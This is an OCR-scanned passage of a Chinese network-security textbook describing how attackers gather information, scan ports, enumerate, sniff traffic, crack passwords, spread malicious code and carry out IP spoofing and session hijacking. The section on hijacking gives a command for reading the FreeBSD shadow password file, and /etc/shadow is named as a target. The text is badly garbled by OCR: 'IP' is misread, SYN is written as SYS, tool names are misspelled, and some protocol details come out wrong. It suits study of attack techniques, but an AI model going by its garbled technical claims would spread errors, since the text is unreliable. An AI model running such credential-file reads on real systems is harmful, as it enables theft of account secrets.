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地 旅行 而 需要 使 用 邮箱 ， 请 帮助 重 设 密码 ”。 前 台 服 务 员 相 信 了 ， 重 设 了 主管 的 密码 。 然 
后 黑客 使 用 主管 的 邮件 账号 成 功 地 进入 了 内 部 网 络 并 造成 了 破坏 。 

搜索 引擎 主要 指 的 是 使 用 Google 和 Yahoo 等 搜索 引擎 对 被 攻击 目标 散落 在 网 络 上 的 
情况 进行 收集 和 汇总 。 其 中 Google 是 最 经 常 使 用 的 一 种 搜索 引擎 。Google 属于 第 二 代 引 
擎 ， 该 引擎 的 好 处 在 于 其 搜索 信息 的 覆盖 面 和 准确 率 都 比较 高 ， 并 且 属 于 自动 方式 ， 即 同 
一 信息 搜索 的 人 越 多 搜索 的 速度 越 快 。 在 提供 简单 搜索 方式 的 同时 ，Google 也 提供 了 复 
杂 的 语法 搜索 方式 ， 灵 活 地 利用 这 些 语 法 可 以 极 大 提高 搜索 的 准确 率 ， 也 可 以 快速 地 搜索 
各 个 网 站 存在 的 漏洞 。 

Whois 查询 就 是 一 个 用 来 查询 域名 是 否 已 经 被 注册 ， 以 及 注册 域名 的 详细 信息 的 数据 
库 ( 如 域名 所 有 人 、 域 名 注册 商 、 域 名 注册 日 期 和 过 期 日 期 等 )。 通 过 Whois 来 实现 对 域名 
信息 的 查询 。 

目前 可 以 提供 Whois 查询 的 机 构 有 美国 的 ARIN、 亚 太 地 区 的 APNIC、 日 本 的 
JPNIC、 中 国 的 CNNIC 等 ， 其 中 ARIN 负责 全 球 的 域名 管理 ，CNNIC 负责 中 国 地 区 的 域 
名 管理 。 公 司 或 者 个 人 可 以 通过 当地 的 机 构 申 请 ， 也 可 以 向 上 一 级 机 构 申 请 。 

DNS 查询 是 另 一 种 搜集 资料 的 方式 ，DNS 域名 服务 系统 是 Intemet 上 的 一 个 分 布 式 数 
据 库 系统 ， 其 用 途 是 提供 域名 和 IP 地 址 之 间 的 转换 。 如 果 DNS 配置 的 不 安全 ， 就 有 可 能 
取得 关于 其 所 在 机 构 的 泄密 性 信息 。DNS 提供 了 nslookup 命令 ， 该 命令 可 以 查询 DNS 主 
机 的 信息 和 邮件 服务 器 的 信息 和 邮件 服务 器 的 信息 ， 这 些 信 息 对 于 判断 目标 主机 的 位 置 非 
常 有 意义 。 


9.2.2 扫描 


完成 资料 收集 之 后 ， 黑 客 一 般 会 使 用 各 种 扫描 工具 对 目标 进行 扫描 ， 以 定位 目标 的 弱 
点 位 置 。 这 些 扫描 工具 可 以 通过 ping 等 方式 确定 目标 主机 是 否 存活 ， 需 要 的 话 再 确定 其 
开放 的 端口 和 开放 的 服务 。 目 前 黑客 主要 使 用 的 扫描 方式 有 ping 扫描 、 端 口 扫 描 、ICMP 
查询 、 操 作 系统 指纹 识别 、 和 拓扑 自动 发 现 等 。 

扫描 的 目的 主要 有 三 个 : 查看 目标 网 络 中 哪些 主机 是 存活 的 ， 查 看 存活 的 主机 运行 了 
哪些 服务 ， 查 看 主机 提供 的 服务 有 无 漏洞 。 


1. ping 扫描 技术 


ping 扫描 技术 也 称 PP 扫描 ，ping 扫描 是 判断 主机 是 否 “ 活 动 ” 的 有 效 方式 ， 目 的 就 
是 确认 目标 主机 的 人 P 地 址 ， 即 扫描 的 人 P 地 址 是 否 分 配给 了 主机 。 对 没有 任何 预知 信息 的 
攻击 者 而 言 ，ping 扫描 是 进行 网 络 扫描 及 入 侵 的 第 一 步 ， 也 是 必 不 可 少 的 一 步 。 对 已 经 了 
解 网 络 整体 卫 划分 的 网 络 安全 人 员 来 讲 ， 也 可 以 借助 ping 扫描 ， 对 主机 的 中 分配 有 一 个 
精确 的 定位 。 常 用 的 ping 扫描 工具 有 操作 系统 的 ping 命令 、 用 于 扫描 网 段 的 fping 以 及 
Internet 工具 集 WS-Ping ProPack 等 。 


2. 端口 扫描 技术 


一 个 端口 是 一 个 潜在 的 通信 通道 ， 也 可 能 是 一 个 入 侵 通 道 。 对 目标 计算 机 进行 
TCP/UDP 端口 扫描 ， 能 得 到 许多 有 用 的 信息 ， 并 发 现 系 统 的 安全 漏洞 。 端 口 扫描 的 目的 
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是 找 出 目标 主机 上 开放 的 端口 和 提供 的 服务 ， 为 漏洞 检测 做 好 准备 。 端 口 扫描 向 目标 主机 
的 TCP /UDP 服务 端口 发 送 探测 数据 包 ， 并 记录 目标 主机 的 响应 。 通 过 分 析 响 应 来 判断 
服务 端口 是 处 于 打开 还 是 关闭 状态 ， 以 获知 端口 提供 的 服务 。 对 于 端口 扫描 可 分 为 TCP 
扫描 和 UDP 扫描 两 大 类 。 

1) TCP 端口 扫描 

这 里 ， 还 是 要 从 TCP 连接 建立 的 过 程 开 始 说 起 . 

大 家 都 知道 ，TCP 与 UDP 不 同 ， 它 是 基于 连接 的 ， 也 就 是 说 : 为 了 在 服务 端 和 客户 
端 之 间 传 送 TCP 数据 ， 必 须 先 建立 一 个 虚拟 电路 ， 也 就 是 TCP 连接 ， 建 立 TCP 连接 的 标 
准 过 程 如 下 。 

首先 ， 请 求 端 (客户 端 ) 发 送 一 个 包含 SYN 标志 的 TCP 报 文 ，SYN 即 同步 
(Synchronize)， 同 步 报 文 会 指明 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 序号 。 

第 二 步 ， 服 务 器 在 收 到 客户 端的 SYN 报 文 后 ， 将 返回 一 个 SYN+ACK 的 报 文 ， 表 示 
客户 端的 请 求 被 接受 ， 同 时 TCP 序号 被 加 一 ，ACK 即 确认 (Acknowledgmenb) 。 

第 三 步 ， 客 户 端 也 返回 一 个 确认 报 文 ACK 给 服务 器 端 ， 同 样 TCP 序列 号 被 加 一 ， 到 
此 一 个 TCP 连接 完成 。 

以 上 的 连接 过 程 在 TCP 协议 中 被 称 为 三 次 握手 (Three-way Handshake)， 如 图 9-3 
所 示 。 
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服务 器 


2 


图 9-3 TCP 连接 的 三 次 握手 


下 面 再 介绍 一 下 TCP connect() 端 口 扫 描 。 

TCP connect() 端 口 扫 描 是 最 容易 进行 的 一 种 ， 这 种 类 型 的 扫描 是 比较 透明 的 ， 因 为 所 
有 的 TCP/IP 连接 都 是 最 先 和 目标 主机 的 TCP 端 1 建立 起 来 的 ， 之 后 端口 号 逐渐 增长 为 
2 EE 4， Pr 

攻击 者 首先 向 所 要 测试 的 端口 发 送 一 个 SYS 探测 数据 包 ， 如 果 收 到 来 自 目标 端口 的 
设置 了 SYS 标记 和 ACK 标记 的 数据 包 ， 攻 击 者 就 可 以 判定 该 端口 是 开放 的 。 之 后 攻击 者 
再 发 送 一 个 ACK 数据 包 来 结束 这 个 三 次 握手 过 程 。 如 果 目 标 端口 关闭 ， 攻 击 者 就 会 收 到 
一 个 直接 返回 的 RST/ACK 数据 包 。 该 方法 最 大 的 优点 是 用 户 不 需要 任何 权限 ， 系 统 中 的 
任何 用 户 都 有 权利 使 用 ， 而 且 可 以 打开 多 个 套 接 字 来 提高 扫描 速度 。 这 种 方法 的 一 个 主要 
不 足 是 过 于 简单 ， 容 易 被 目标 主机 识别 和 记录 。 

TCP SYN 扫描 ( 半 连 接 扫描 )， 首 先 向 目标 主机 发 送 请 求 ， 当 目标 主机 返回 响应 后 ， 立 
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即 切断 连接 过 程 ， 并 查看 响应 情况 。 如 果 目 标 主 机 返回 ACK 信息 ， 表 示 目 标 主机 的 该 端 
口 开放 ， 如 果 目 标 主 机 返回 RST 信息 ， 表 明 该 端口 没有 开放 。SYS 扫描 的 优点 在 于 即使 
日 志 中 对 扫描 有 所 记录 ， 但 是 尝试 进行 连接 的 记录 也 要 比 全 连接 扫描 少 得 多 。 主 要 缺点 
是 ， 对 于 大 部 分 操作 系统 ， 发 送 主机 需要 构造 适用 于 这 种 扫描 的 人 P 数据 包 ; 通常 情况 
下 ， 构 造 SYN 数据 包 需 要 超级 用 户 或 者 授权 用 户 访问 特定 的 系统 调用 ， 实 现 起 来 要 困难 
一 些 。 

2) ”UDP 端口 扫描 

为 了 发 现 正 在 服务 的 UDP 端口 ， 通 常 是 构造 一 个 内 容 为 空 的 UDP 数据 包 发 送 到 目的 
端口 。 若 目的 端口 上 有 服务 正在 等 待 ， 则 目的 端口 返回 错误 的 消息 ; 若 目的 端口 处 于 关闭 
状态 ， 则 目的 主机 返回 ICMP 端口 不 可 达 消 息 。 由 于 UDP 端口 扫描 软件 要 计算 传输 中 丢 
包 数 量 ， 扫 描 速 度 较 慢 ， 而 且 扫描 结果 也 不 太 准 确 。 


3. ICMP 查询 


通过 向 目标 系统 发 送 ICMP 分 组 ， 就 能 很 快 地 得 到 各 种 有 价值 的 信息 。 如 使 用 UNIX 
工具 icmpquery 向 目标 系统 发 送 ICMP 类 型 为 13 的 消息 ， 即 时 间 惟 分组， 就 能 请 求 返回 
该 系统 的 时 间 ， 改 用 ICMP 类 型 为 17 的 消息 ， 即 地 址 掩 码 请 求 分 组 ， 则 能 请 求 返回 某 个 
设备 的 子 网 掩 码 。 知 道 网 卡 的 子 网 掩 码 非 常 重要 ， 因 为 据 此 可 以 确定 要 用 到 的 所 有 子 网 。 


4. 操作 系统 指纹 识别 


在 讨论 操作 系统 指纹 识别 之 前 需要 了 解 协议 栈 指纹 识别 的 含义 。 协 议 栈 指纹 识别 是 一 
项 非常 强大 的 技术 ， 它 能 够 迅速 识别 每 台 主机 上 的 操作 系统 。 

从 原理 上 说 ， 不 同 公司 设计 的 IP 协议 栈 存在 很 多 细微 差别 ， 也 就 是 说 不 同 的 公司 在 
编写 自己 的 TCP/IP 协议 栈 时 ， 通 常 对 确定 的 RFC 文档 做 出 不 同 的 解释 ， 因 此 可 以 通过 这 
些 差异 对 目标 的 操作 系统 进行 猜测 。 操 作 系 统 指纹 识别 技术 是 由 NMAP 组 织 的 Fyodor 提 
出 的 。 


5. 拓扑 发 现 


拓扑 发 现 是 另 一 种 形式 的 扫描 ， 它 使 用 TraceRoute 原理 ， 根 据 ICMP 返回 的 路 径 和 标 
识 来 确定 网 络 的 拓扑 结构 。 

目前 拓扑 发 现 软件 数量 很 多 ， 但 优秀 软件 却 屈指 可 数 ， 具 有 代表 性 的 软件 有 Cheops 
和 Tkined。 


9.2.3 查 点 


信息 查 点 (Enumeration) 是 在 信息 踩点 的 基础 上 确定 目标 系统 中 有 哪些 资源 可 以 被 利 
用 ， 这 些 资源 主要 包括 网 络 和 共享 资源 、 用 户 和 用 户 组 、 应 用 程序 及 其 旗 标 。 

如 果 一 开始 的 信息 踩点 没有 找到 任何 直接 的 入 侵 路 径 ， 攻 击 者 就 会 转向 标识 有 效 的 用 
户 账号 或 保护 不 当 的 共享 资源 ， 从 系统 中 抽取 有 效 账号 或 出 口 资源 名 。 一 旦 查 点 出 一 个 有 
效用 户 名 或 共享 资源 ， 只 要 有 足够 的 时 间 ， 攻 击 者 就 能 猜 出 对 应 的 保密 字 或 标识 与 资源 共 
享 协议 关联 的 某 些 脆 弱点 。 查 点 涉及 目标 系统 的 主动 连接 和 定向 查询 ， 因 此 查 点 活动 可 能 
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被 目标 系统 登记 下 来 或 以 其 他 方式 被 注意 到 。 
9.3 攻击 技术 


在 攻击 (Exploib 阶 段 ， 攻 击 者 通过 探测 阶段 掌握 的 有 关 攻 击 目标 的 安全 情况 会 选择 不 
同 的 攻击 方法 来 达成 其 攻击 目的 。 攻 击 方法 层出不穷 ， 但 可 以 将 其 归 为 以 下 4 类 : 窃听 技 
术 、 欺 骗 技 术 、 拒 绝 服务 攻击 和 数据 驱动 攻击 。 


9.3.1 窃听 技术 


窃听 技术 指 攻击 者 通过 非法 手段 对 系统 活动 进行 监视 从 而 获得 一 些 安全 关键 信息 。 目 
前 属于 窃听 技术 的 流行 攻击 方法 有 键 击 记录 器 、 网 络 监听 、 非 法 访问 数据 和 搜 取 密码 文 
件 。 键 击 记 录 器 是 植 入 操作 系统 内 核 的 隐蔽 软件 ， 通 常 实现 为 一 个 键盘 设备 驱动 程序 ， 能 
够 把 每 次 键 击 都 记录 下 来 ， 存 放 到 攻击 者 指定 的 隐藏 的 本 地 文件 中 。 著 名 的 软件 有 
Win32 平台 下 适用 的 区 S 等 。 

网 络 监 听 的 目的 是 截获 通信 的 内 容 ， 监 听 的 手段 是 对 协议 进行 分 析 。 网 络 监听 ， 通 常 
也 称 为 网 络 嗅 探 ， 即 监视 探听 。 黑 客 利用 它 ， 就 有 可 能 在 信息 以 明文 方式 传输 时 ， 利 用 网 
络 监听 进行 攻击 。 因 为 在 网 络 上 ， 监 听 的 设置 可 以 在 任何 一 个 位 置 ， 但 比较 理想 的 地 方 是 
在 网 关 、 路 由 器 和 防火 墙 之 类 的 设备 处 。 所 以 ， 当 黑客 将 网 络 接口 设置 为 监听 模式 时 ， 就 
很 容易 截获 网 上 的 信息 。 如 果 黑 客 截获 了 用 户 的 口令 ， 他 就 有 可 能 登录 某 主 机 系统 ， 并 窃 
取 用 户 的 权限 ， 获 得 重要 信息 。 

嗅 探 器 的 英文 名 称 是 Sniff， 可 以 理解 为 一 个 安装 在 计算 机 上 的 窃听 设备 ， 它 可 以 用 
来 窃听 计算 机 在 网 络 上 所 传递 的 信息 。 计 算 机 网 络 嗅 探 器 则 可 以 窃听 计算 机 程序 在 网 络 上 
发 送 和 接收 到 的 数据 ， 不 过 这 些 数据 是 大 量 无 意义 的 二 进 制 数据 。 必 须 使 用 特定 的 网 络 协 
议 来 分 析 嗅 探 到 的 数据 ， 只 有 这 样 才能 够 进行 正确 的 解码 。Sniffer pro 就 是 一 个 完善 的 网 
络 监听 工具 。 

监听 器 Sniffer 的 原理 : 在 局 域 网 中 与 其 他 计算 机 进行 数据 交换 的 时 候 ， 发 送 的 数据 
包 发 送 所 有 连 在 一 起 的 主机 ， 也 就 是 广播 ， 在 报头 中 包含 目标 机 器 的 正确 地 址 。 因 此 只 有 
与 数据 包 中 目标 地 址 一 致 的 那 台 主 机 才 会 接收 数据 包 ， 其 他 的 机 器 都 会 将 包 丢弃 。 但 是 ， 
当主 机 工作 在 监听 模式 下 时 ， 无 论 接 收 到 的 数据 包 中 目标 地 址 是 什么 ， 主 机 都 将 其 接收 下 
来 。 然 后 对 数据 包 进 行 分 析 ， 就 得 到 了 局 域 网 中 通信 的 数据 。 一 台 计 算 机 可 以 监听 同一 网 
段 所 有 的 数据 包 ， 但 不 能 监听 不 同 网 段 的 计算 机 传输 的 信息 。 

除了 非常 著名 的 监听 软件 Sniffer Pro 以 外 ， 还 有 一 些 常 用 的 监听 软件 ， 嗅 探 经 典 一 一 
Iris; 密码 监听 工具 一 一 Win Sniffer; 密码 监听 工具 一 一 pswmonitor 和 非 交 换 环境 局 域 网 的 
fssniffer 等 。Sniffer Pro 是 一 款 非常 著名 的 监听 工具 ， 但 是 Sniffer Pro 不 能 提取 有 效 的 
信息 。 

非法 访问 数据 指 攻 击 者 或 内 部 人 员 违 反 安全 策略 对 其 访问 权限 之 外 的 数据 进行 非法 访问 。 

抽取 密码 文件 是 攻击 者 进行 口令 破解 获取 特权 用 户 或 其 他 用 户口 令 的 必要 前 提 ， 关 键 
的 密码 文件 如 Unix 平台 下 的 /etc/password 和 /etc/shadow 等 。 
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9.3.2 ”欺骗 技术 


欺骗 技术 是 攻击 者 通过 冒充 正常 用 户 以 获得 对 攻击 目标 访问 权 或 获取 关键 信息 的 攻击 
方法 ， 属 于 此 类 的 有 获取 口令 、 恶 意 代码 、 网 络 欺骗 等 攻击 方法 。 


1. 获取 口令 


获取 口令 可 以 通过 默认 口令 ,口令 猜测 和 口令 破解 三 种 途径 进行 。 某 些 软 件 和 网 络 设 
备 在 初始 化 时 会 设置 默认 的 用 户 名 和 密码 ， 意 在 允许 厂家 有 能 力 绕 过 被 锁 闭 或 遗忘 的 管理 
员 账 号 ， 但 这 些 默认 口令 也 给 攻击 者 提供 了 最 容易 利用 的 脆弱 点 。 口 令 猜 测 则 是 历史 最 为 
悠久 的 攻击 手段 ， 由 于 用 户 普遍 缺乏 安全 意识 ， 不 设 密码 或 使 用 弱 密码 (例如 : 123456， 
或 把 生日 作为 密码 ) 的 情况 随处 可 见 ， 因 此 为 攻击 者 进行 口令 猜想 提供 了 可 能 。 口 令 破解 
技术 则 提供 了 进行 口令 猜想 的 自动 化 工具 ， 通 常 需要 攻击 者 首先 获取 密码 文件 ， 然 后 遍历 
字典 或 高 频密 码 列 表 从 而 找到 正确 的 口令 。 著 名 的 工具 有 John the Prpple、Crack 和 适用 于 
Win32 平台 的 LophtCrack 等 。 常 见 的 口令 获取 的 方式 如 下 。 

1) “字典 攻击 

字典 攻击 基本 上 是 一 种 被 动 攻击 。 黑 客 获取 目标 系统 的 口令 文件 ， 试 图 以 离线 的 方式 
破解 口令 ， 黑 客 先 猜 一 个 口令 ， 然 后 用 与 原 系统 中 一 样 的 加 密 算 法 (加 密 算法 是 公开 的 ) 来 
加 密 此 口令 ， 将 加 密 的 结果 与 文件 中 的 加 密 口 令 比较 ， 若 相同 则 猜 对 了 。 因 为 很 少 有 用 户 
使 用 随机 组 合 的 数字 和 字母 来 做 口令 ， 许 多 用 户 使 用 的 口令 都 可 在 一 个 特殊 的 黑客 字典 中 
找到 。 在 字典 攻击 中 ， 入 侵 者 并 不 穷 举 所 有 字母 数字 的 排列 组 合 来 猜测 口令 ， 而 仅仅 用 黑 
客 字典 中 单词 来 尝试 ， 黑 客 们 已 经 构造 了 这 样 的 字典 ， 不 仅 包括 了 英语 或 其 他 语言 中 的 常 
见 单词 ， 还 包括 了 黑客 词语 、 拼 写 有 误 的 单词 和 一 些 人 名 。 已 有 的 黑客 字典 包括 了 大 约 
20 万 个 单词 ， 用 来 猜测 口令 非常 成 功 ， 而 对 现代 的 计算 机 来 说 ， 尝 试 所 有 20 多 万 个 单词 
是 很 轻松 的 事 。LetMeIn Version 2.0 是 这 类 程序 中 的 典型 代表 。 

2) “ 假 登录 程序 

在 系统 上 有 账号 的 用 户 可 以 利用 程序 设计 出 和 Windows 登录 画面 一 模 一 样 的 程序 ， 
以 骗取 其 他 人 的 账号 和 密码 ， 若 是 在 这 个 假 的 登录 程序 上 输入 账号 和 密码 ， 它 就 会 记 下 所 
骗 到 的 账号 和 密码 ， 然 后 告诉 您 输入 有 误 ， 要 您 再 试 一 次 。 接 下 来 假 的 登录 程序 便 自 动 结 
束 ， 将 控制 权 还 给 操作 系统 。 

3) ”密码 探测 程序 

在 绝 大 多 数 情形 下 ，NT 系统 内 部 所 保存 与 传送 的 密码 ， 部 是 经 过 一 个 单 向 杂凑 (Hash) 
函数 编码 处 理 过 ， 完 全 看 不 出 来 原始 密码 的 模样 ， 而 且 理论 上 要 逆向 还 原 成 原始 密码 的 概 
率 几 近 于 截 。 这 些 编码 过 的 密码 存放 在 SAM(Security Account ManageD 数 据 库 内 ， 一 般 正 
常 的 程序 不 会 去 理会 它 ， 然 而 ， 后 来 网 络 上 出 现 了 一 个 专门 用 来 探测 NT 密码 的 程序 - 
LoPhtCrack， 它 能 利用 各 种 可 能 的 密码 ， 反 复 模拟 NT 的 编码 过 程 ， 并 将 所 编 出 来 的 密码 
与 SAM 数据 库 的 密码 比较 ， 如 果 两 者 相同 ， 就 表示 得 到 了 正确 的 密码 。 

4) ”修改 系统 

这 是 一 种 比较 严重 的 主动 攻击 。 黑 客 修改 合法 的 系统 程序 ， 使 得 该 程序 不 仅 完 成 原 有 
的 功能 ， 而 且 还 可 以 为 黑客 收集 用 户口 令 ， 也 就 是 说 ， 黑 客 在 系统 中 放置 了 特洛伊 木马 。 
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这 些 程序 是 针对 ISP 服务 器 的 类 似 “ 特 洛 伊 木马”(Trojan Horses) 的 病毒 程序 的 变 体 。 它 
看 起 来 像 一 种 合法 的 程序 ， 但 是 它 静 静 地 记录 用 户 输入 的 每 个 口令 ， 然 后 把 它们 发 送 给 黑 
客 的 Internet 信箱 。 或 者 将 系统 中 的 Login 和 Telnet 程序 修改 使 得 能 够 记录 用 户 的 名 字 和 
口令 到 一 个 文件 中 ， 并 将 该 文件 隐藏 到 系统 中 的 某 一 个 地 方 。 此 文件 给 黑客 提供 了 许多 账 
号 的 名 字 和 相应 的 口令 ， 人 允许 黑客 冯 进 其 他 的 系统 并 放置 特洛伊 木马 。 

2. 恶意 代码 

恶意 代码 的 含义 可 以 从 下 三 个 方面 理解 : 一 是 “代码 ”， 即 恶意 代码 是 在 一 定 的 环境 
下 可 以 执行 的 计算 机 程序 ， 二 是 “恶意 的 行为 ”， 在 不 为 用 户 所 知 的 情况 下 破坏 侵入 用 户 
的 计算 机 系统 ， 破 坏 计算 机 系统 、 网 络 或 信息 的 保密 性 、 完 整 性 、 可 用 性 ， 三 是 “恶意 移 
动 性 ”， 未 经 授权 在 计算 机 之 间 传 播 。 其 通常 冒充 有 用 的 软件 工具 、 重 要 的 信息 等 ， 诱 导 
用 户 下 载运 行 或 利用 邮件 客户 端 和 浏览 器 来 自动 运行 ， 从 而 为 攻击 者 提供 便利 。 恶 意 代码 
按 传播 方式 分 类 可 以 分 为 计算 机 病毒 、 木 马 、 蠕 虫 、 即 时 消息 攻击 ; 按 行为 分 类 可 以 分 为 
计算 机 病毒 、 间 谍 软 件 、 浏 览 器 劫持 。 

恶意 代码 (Malicious Code) 主 要 是 指 故意 执行 危害 信息 安全 的 恶意 任务 的 代码 ， 它 们 一 
般 潜 伏 在 受害 计算 机 系统 中 实施 破坏 或 窃取 信息 等 不 良 活动 。 它 们 应 用 或 尝试 以 各 种 方式 
侵入 计算 机 或 网 络 系统 ， 干 扰 或 阻碍 系统 的 正常 工作 ， 甚 至 对 重要 信息 进行 泄露 和 算 改 。 

恶意 代码 的 危害 主要 包括 以 下 几 点 : 

(1) 破坏 数据 。 很 多 恶意 代码 在 发 作 时 直接 破坏 计算 机 的 重要 数据 ， 所 利用 的 手段 有 
格式 化 硬盘 ， 改 写 文件 分 配 表 和 目录 区 ， 删 除 重要 文件 或 者 用 无 意义 的 数据 覆盖 文件 等 。 
例如 磁盘 杀手 病毒 (Disk Killer) 在 硬盘 感染 后 的 累计 开机 时 间 48 小 时 内 发 作 ， 发 作 时 屏幕 
上 显示 “Warming ! Don't tum off power or remove diskette while Disk Killer is 
Processing! ”， 并 改写 硬盘 数据 。 

(2) 占用 磁盘 存储 空间 。 引 导 型 病毒 的 侵占 方式 通常 是 用 病毒 本 身 占据 磁盘 引导 扇 
区 ， 被 覆盖 的 扇 区 的 数据 将 永久 性 丢失 ， 无 法 恢复 。 文 件 型 的 病毒 利用 一 些 DOS 功能 进 
行 传染 ， 检 测 出 未 用 空间 并 把 病毒 的 传染 部 分 写 进去 。 所 以 一 般 不 会 破坏 原 数据 ， 但 会 非 
法 侵占 磁盘 空间 ， 文 件 会 不 同 程度 地 加 长 。 

(3) 抢占 系统 资源 。 大 部 分 恶意 代码 在 动态 下 都 是 常 驻 内 存 的 ， 这 必然 抢占 一 部 分 系 
统 资源 ， 致 使 一 部 分 软件 不 能 运行 。 恶 意 代码 总 是 修改 一 些 有 关 的 中 断 地 址 ， 在 正常 中 断 
过 程 中 加 入 病毒 体 ， 干扰 系统 运行 。 

(4) 影响 计算 机 运行 速度 。 恶 意 代 码 不 仅 占用 系统 资源 、 覆 盖 存 储 空 间 ， 还 会 影响 计 
算 机 运行 速度 。 比 如 ， 恶 意 代码 会 监视 计算 机 的 工作 状态 ， 伺 机 传染 激发 ， 还 有 些 恶 意 代 
码 会 为 了 保护 自己 而 进行 加 密 ， 致 使 CPU 多 次 执行 解密 和 加 密 过 程 ， 额 外 执行 了 上 万 条 
指令 。 


3. 网 络 欺骗 


网 络 欺骗 指 攻 击 者 通过 向 攻击 目标 发 送 冒充 其 信任 的 主机 的 网 络 数据 包 ， 达 到 获取 访 
间 权 或 执行 命令 的 攻击 方法 。 具 体 的 网 络 欺骗 有 卫 欺骗、 会话 动 持 、ARP( 地 址 解析 协议 ) 
欺骗 和 RIP( 路 由 信息 协议 ) 路 由 欺骗 等 。 
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1) 下 欺骗 

IP 欺骗 ， 简 单 来 说 就 是 向 目标 主机 发 送 源 地 址 为 非 本 机 人 P 地 址 的 数据 包 。IP 欺骗 在 
各 种 黑客 攻击 方法 中 都 得 到 了 广泛 的 应 用 ， 比 如 ， 进 行 拒绝 服务 攻击 、 伪 造 TCP 连接 、 
会 话 劫持 、 隐 藏 攻击 主机 地 址 等 ， 卫 欺骗 的 表现 形式 主要 有 两 种 : 一 种 是 攻击 者 伪造 的 
JP 地 址 不 可 达 或 者 根本 不 存在 ， 这 种 形式 的 IP 欺骗 ， 主 要 用 于 迷惑 目标 主机 上 的 入 侵 检 
测 系统 ， 或 者 是 对 目标 主机 进行 DOS 攻击 ， 如 图 9-4 所 示 ; 另 一 种 IP 欺骗 则 着 眼 于 目标 
主机 和 其 他 主机 之 间 的 信任 关系 ， 攻 击 者 通过 在 自己 发 出 的 IP 包 中 填 入 被 目标 主机 所 信 
任 的 主机 的 他 来 进行 冒充 ， 一 旦 攻击 者 和 目标 主机 之 间 建 立 了 一 条 TCP 连接 (在 目标 主机 
看 来 ， 是 它 和 它 所 信任 的 主机 之 间 的 连接 ， 事 实 上 ， 它 是 把 目标 主机 和 被 信任 主机 之 间 的 
双向 TCP 连接 分 解 成 了 两 个 单 向 的 TCP 连接 )， 攻 击 者 就 可 以 获得 对 目标 主机 的 访问 权 ， 
并 可 以 进一步 进行 攻击 ， 如 图 9-5 所 示 。 


9-4 ”伪造 无 实际 意义 的 IP 


9-5 ”攻击 者 伪装 成 被 目标 主机 所 信任 的 主机 


IP 欺骗 的 步 又 如 下 : 

(1) 找到 一 个 被 目标 主机 信任 的 主机 。 

(2) 使 被 信任 的 主机 丧失 工作 能 力 。 

(3) 伪装 成 被 信任 的 主机 ， 向 目标 主机 发 送 SYN。 

(4) 猜测 或 嗅 探 得 到 SYN+ACK 的 值 。 

(5) 再 向 目标 主机 发 送 ACK 来 建立 连接 ， 如 图 9-6 所 示 。 

TCP 使 用 的 数据 包 序列 号 是 一 个 32 位 的 计数 器 ， 计 数 范围 为 0 一 4294967295。TCP 
为 每 一 个 连接 选择 一 个 初始 序列 号 ISN(Initial Sequence NumberD)， 为 了 防止 因为 延迟 、 重 
传 等 事件 对 三 次 握手 过 程 的 干扰 ，ISN 不 能 随便 选取 ， 不 同系 统 有 不 同 算法 。 对 于 卫 欺 
骗 攻 击 来 说 ， 最 重要 的 就 是 理解 TCP 如 何 分 配 ISN 以 及 ISN 随时 间 变 化 的 规律 。 

规定 这 一 32 位 的 序列 号 之 值 每 隔 4ms 加 1。 在 BerkeleyUNIX 中 ， 初 始 序列 号 是 由 
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tcpinit() 函 数 确定 的 。ISN 值 每 秒 增加 128000， 如 果 有 连接 出 现 ， 每 次 连接 将 把 计数 器 的 
数值 增加 64000， 这 使 得 用 于 表示 ISN 的 32 位 计数 器 在 没有 连接 的 情况 下 ， 每 9.32h 复位 
一 次 。 这 样 ， 将 有 利于 最 大 限度 地 减少 旧 有 连接 的 信息 干扰 当前 连接 的 机 会 。 非 常 重要 的 
一 点 就 是 对 ISN 的 选择 算法 。 事 实 上 ， 由 于 ISN 的 选择 不 是 随机 的 ， 而 是 有 规律 可 循 
的 ， 这 就 为 黑客 欺骗 目标 系统 创造 了 条 件 。 很 多 进行 IP 欺骗 的 黑客 软件 也 主要 着 眼 于 计 
算 ISN 和 伪造 数据 包 这 两 个 方面 。 由 于 卫 欺骗 技术 是 针对 协议 本 身 的 缺陷 来 实现 的 ， 所 
以 其 影响 范围 也 十 分 广泛 。 容 易 遭 受 人 P 欺骗 攻击 的 服务 程序 主要 有 : 

e@ ”远程 过 程 调用 (RPC)。 

@ ”任何 使 用 IP 地 址 进行 认证 的 服务 。 

@ XWindow 系统 。 

@ 及 服务 套件 (包括 rlogin、rsh 等 )。 


(1) TCPSYS (伪造 的 源 中 地址) 


2) TCP SYS+ACK=? 
2 
SS y 


攻击 者 A 
(3) 猜测 或 噢 探 得 到 SYS+ACK 的 值 


(4) TCPACK( 伪 造 的 源 IP 地 址 ) 


图 9-6 IP 欺骗 示意 图 

2) ”会 话 动 持 

会 话 劫持 指 攻击 者 冒充 网 络 正常 会 话 中 的 某 一 方 ， 从 而 欺骗 另 一 方 执行 其 所 要 的 
操作 。 

例如 你 Telnet 到 某 台 主机 ， 这 就 是 一 次 Telnet 会 话 ， 你 浏览 某 个 网 站 ， 这 就 是 一 次 
HTTP 会 话 。 而 会 话 劫持 (Session Hijack)， 就 是 结合 了 嗅 探 以 及 欺骗 技术 在 内 的 攻击 手 
段 。 例 如， 在 一 次 正常 的 会 话 过 程 当中 ， 攻 击 者 作为 第 三 方 参与 到 其 中 ， 他 可 以 在 正常 数 
据 包 中 插入 恶意 数据 ， 也 可 以 在 双方 的 会 话 当中 进行 监听 ， 甚 至 可 以 是 代替 某 一 方 主机 接 
管 会 话 。 我 们 可 以 把 会 话 支持 攻击 分 为 两 种 类 型 ， 中 间 人 攻击 (Man In The Middle， 简 称 
MITM) 和 注射 式 攻 击 (Injection)， 并 且 还 可 以 把 会 话 支持 攻击 分 为 两 种 形式 ， 被 动 劫持 和 
主动 动 持 。 被 动 动 持 实际 上 就 是 在 后 台 监视 双方 会 话 的 数据 流 ， 从 中 获得 敏感 数据 ， 而 主 
动 劫持 则 是 将 会 话 当中 的 某 一 台 主 机 “ 踢 ” 下 线 ， 然 后 由 攻击 者 取代 并 接管 会 话 ， 这 种 攻 
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击 方法 危害 非常 大 ， 攻 击 者 可 以 做 很 多 事情 ， 比 如 “cat etc/master.passwd”(FreeBSD 下 的 
Shadow 文件 )。 

会 话 劫持 利用 了 TCP/IP 工作 原理 来 设计 攻击 。TCP 使 用 端 到 端的 连接 ， 即 TCP 用 
( 源 卫 ， 源 TCP 端口 号 ， 目 的 卫 ， 目 的 TCP 端 号 ) 来 唯一 标识 每 一 条 已 经 建立 连接 的 TCP 
